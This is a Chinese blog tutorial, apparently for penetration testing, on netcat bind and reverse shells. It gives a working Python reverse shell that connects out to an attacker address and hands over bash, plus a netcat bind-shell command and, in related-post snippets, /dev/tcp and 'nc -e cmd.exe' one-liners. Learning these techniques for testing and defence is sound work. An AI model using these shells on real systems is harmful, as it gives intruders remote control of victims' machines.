使用netcat的正向 / 反向shell

已于 2024-01-03 13:42:14 修改
阅读量527 收藏 3
点赞数
分类专栏: 安全测试 文章标签: linux shell centos ubuntu python
于 2019-01-08 14:24:00 首次发布
土法炼钢师呕血之作,转载还望说明出处!
本文链接:https://blog.csdn.net/bo_mask/article/details/118690728
版权

  • reverse shell

  • bind shell

reverse shell描述图:

在此示例中,目标使用端口4444反向连接攻击主机。-e选项将Bash shell发回攻击主机。请注意,我们也可以在Windows的cmd.exe上使用-e选项。假设我们已经在目标主机上找到了远程代码执行(RCE)漏洞。我们可以在目标主机上使用-e发出Netcat命令,并使用Netcat发出命令启动反向shell。

先启动攻击端的监听:

再在目标端启动反向shell:

 linux

然后可以在攻击端控制目标端的服务器,以root权限;

win7

然后可以在攻击端控制目标端的win7系统,以administrator权限;

python的反向shell:

import os,socket,subprocess;
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.aaa.21',8080))
#重定向shell输出
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
#执行子程序
p=subprocess.call(['/bin/bash','-i'])

正向bind Shell

在该图中,目标使用Netcat侦听器将Bash shell绑定到它特定端口4444。攻击者使用简单的Netcat命令连接到此端口。设置bind shell的步骤如下:

使用Netcat将一个bash shell绑定到4444端口。 从攻击主机连接到端口4444上的目标主机。 从攻击主机发出命令到目标主机上。

root@kali:~# nc -lvp 4444 -e /bin/sh
listening on [any] 4444 ...
10.1.20.x: inverse host lookup failed: Unknown host
connect to [10.1.20.x] from (UNKNOWN) [10.1.20.x] 6065
root@kali:~# a

顺便提一下

如果有任何问题,你可以在这里找到我 ,软件测试交流qq群,209092584

软件测试技术
关注
专栏目录
netcat瑞士军刀(正向shell反向shell
逍遥小哥的博客
12-04 330
不管是正向shell还是反向shell 它们都是由被控制端将命令行输入和输入通过tcp/udp端口,发送到控制端,只是正向shell是由控制端主动发起连接的,而反弹shell是被控制端主动发起连接的。原理:被控端将cmd.exe重定向到控制端的6666端口,控制端只需要监听本地的6666端口,被控端主动连接控制端,即可获得shell。原理:被控端将cmd重定向到本地1111端口,控制端主动连接到被控制端的1111端口,即获得shell反向shell(有安全设备防护,控制端无法主动连接被控制端。
netcat使用及反弹shell
Bu2n的博客
02-20 5818
内网中使用netcat进行正向反向获取shell
bring_coco的博客
12-07 3289
本次演示在linux环境下 一般用外网机器对内网机器进行访问时,多用反向shell,内网机器与内网机器之间多用正向shell 正向shell 由于内网及其属于边界服务器,因此我们先进行正向shell演示(正向shell是在目标机器上进行监听): 内网机器上命令:nc -lvp 4444 -e /bin/sh 本地机器上命令:nc 10.0.78.41 4444 显示已经连接 进行验证: 说明正向连接成功 反向shell 反向shell是在本地vps上进行监听,目标机器进行连接 本地机器上命令:nc -l
Netcat 从监听开始简单易懂 ,正向反向shell 的学习过程
任雪飘的博客
03-01 659
大家好!我是任雪飘!一个web 菜鸡,讲一个nc 正向反向shell 的学习过程! 首先我们下载netcat 安装方式一 yum install -y netcat 或者 yum install -y nc 安装方式二 https://eternallybored.org/misc/netcat/ 把netcat 放入linux 系统里面 进入netcat-0.7.1.tar.gz所在目录,并执行下面的命令: tar -zxvf netcat-0.7.1.tar.gz -C /u
反向 shell 访问工具 netcat
一个软件工程师的技术笔记
03-08 665
问题 在实际开发项目中,原型产品在推向市场、实际部署使用之前,也需要在实际环境进行试验性运行,以便测试和改进。 但可能出现的一个问题是,部署测试的实际环境与办公室有一定的距离,甚至在不同的城市里。当应用服务程序异常后者挂掉的时候,就没有办法探查设备的实际情况了。 要是在办公室里,就可以基于局域网 ssh 登录访问,甚至基于调试串口登录。由于设备在远程,是无法通过 ssh 直接登录了。 基本...
Netcat反弹shell
Yy10205473的博客
01-14 607
Netcat反弹shell基础介绍使用python反弹shell应用场景使用方法当nc不支持-e时如何反弹shell应用场景使用方法 #应用场景 某些拿到服务器权限之后,想要设置一个反弹shell。但是目标服务器上没有安装nc时。 基础介绍 将liunx系统下的bash(shell)传递到window系统下的pc 反弹shell:bash -i >& /dev/tcp/IP地址/端口 0>&1 liunx主机连接window主机 bash -i :已交互模式运行bash she
shell正向反向
qq_46258964的博客
02-05 8757
正向shell反向shell 正向shell控制端主动发起连接去连接被控制反向shell:被控制端主动连接控制端 在实战中,大多数采用反向shell,因为正向shell有很多因素导致连接失败, 比如说硬件设备有防火墙,入侵防御系统等,还有网站防火墙,端口占用,权限不足等场景,特别是硬件设备如果你正向连接被防火墙拦截导致打草惊蛇,后期攻击相当繁琐。 反向shell:而被控制端主动向外发送的数据包通常都不会被拦截。 反向shell如下 Linux常见反向shell bash反弹shell nc -lvp
使用socat反向Shell多台机器
fm18771120556的博客
03-16 675
原创:打码日记(微信公众号ID:codelogs),欢迎分享,转载请保留出处。 场景 很多时候,我们需要批量操作多台机器,业界一般使用Ansible来实现,但使用Ansible来操作多台机器的前提是需要有ssh权限的,可悲的是,对于开发人员来说,一般是没有正式环境机器的ssh权限的,只能通过一个指定的入口登录机器,也可以理解,毕竟正式环境如此重要。 不过,如果你的生产环境可以访问你的开发机,那么可以通过反向Shell来访问机器,然后将反向Shell与tmux结合,又可实现同时操作多台机器的效果,这就是本.
内网渗透之Windows反弹shell(综合)
墨鱼菜鸡
09-10 1089
目录 反向shell简介 01什么是正向shell 02什么是反向shell Windows反弹shell 01NC正向shell 01NC反向shell 02mshta.exe 通过Metasoloit的HTA Web Server模块发起HTA攻击 通过msfvenom生成恶意hta文件 03Rundll32.exe 04Reg...
Reverse-Shell-Client:反向外壳客户端是netcat反向外壳侦听器的基于Python的替代方案
05-08
反向外壳客户端 反向外壳客户端是netcat反向外壳侦听器( nc -lvp <port> )的基于Python的替代方案。 默认的反向Shell客户端( rsh-client.py )附带了许多功能,例如在您设法获得Shell的(基于Unix的)远程主机上上传,下载,执行和编辑文件。 您还可以下载独立版本( rsh-client-standalone.py ),这是一个较小的版本,没有自定义命令,当希望将shell作为另一个进程(如果netcat不可用)获取本地shell权限时,该版本最有用系统。
[ 隧道技术 ] 反弹shell的集中常见方式(一)nc反弹shell
qq_51577576的博客
08-03 1803
攻击者机器 192.168.3.27 和靶机 192.168.3.29 可以相互的访问,这个时候可以使用正向shell攻击者机器 192.168.3.27 不能直接访问靶机,但是靶机 192.168.3.29 可以访问攻击者的机器,这个时候使用反向shell。...
渗透测试学习笔记-Netcat工具使用
深入交流学习:webMsec
07-23 1106
渗透测试学习笔记-Netcat工具使用
netcat获得反向shell
天元喜羊羊的博客
07-06 3971
netcat下载地址:http://sourceforge.net/projects/netcat/?source=navbar 在BT5上: root@bt:~# nc -l -p 8090 -e /bin/sh 在XP上: E:\>nc 192.168.1.11 8090 ls Desktop ifconfig eth0 Link encap:Ethernet HWaddr
Php reverse shell with netcat
kezhen的专栏
09-29 1770
摘自:http://www.binarytides.com/php-reverse-shell-with-netcat/ Once you are able to gain access to a remote website or server such that you can upload any arbitrary file to it, the next thing you wan
Netcat(NC)正反弹shell
来到了学渣的博客
01-07 2123
Necat(NC)正反弹shell Netcat反向反弹shell 目标:Win7的shell反弹到kali上 kali的nc命令 nc -lvp 888 Win7靶机nc命令 * nc64.exe IP 端口号 -e cmd.exe 然后可以在kali攻击端控制目标端的win7系统 Netcat正向反弹shell 目标是将kali上的shell弹到win7上 kali的n...
netcat教程
热门推荐
chenj_freedom的技术点滴
08-11 1万+
简介 netcat是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据。通过与其他工具结合和重定向,你可以在脚本中以多种方式使用它。 各种版本的netcat netcat有非常多的版本,刚开始我自己也很混乱,因为各个版本的netcat使用方法和参数都不太一样。这里列举下我现在实验环境中的几个版本。 case1 Kail Linux自带的nc工具,版本是v1.10-41+b1。
netcat 反弹shell
weixin_40328085的博客
09-18 366
第一种情况:用 bash -i 客户机:netcat -l -p 7777 服务器(被黑主机):bash -i >& /dev/tcp/192.168.227.1/7777 0>&1 >& 后面跟上/dev/tcp/ip/port 这个文件代表将bash -i 的标准输出和标准错误输出 重定向到 这个文件(描述符)。(其实有点像个通道) 0&gt...
MSSQL2K - SQL Injector - Query String Parameter Attack结合netcat获得反向cmdshell
天元喜羊羊的博客
07-08 1120
fasttrack操作: root@bt:~# cd /pentest/exploits/fasttrack/ root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i *********************************************** ******* Performing dependency checks...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

软件测试技术

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值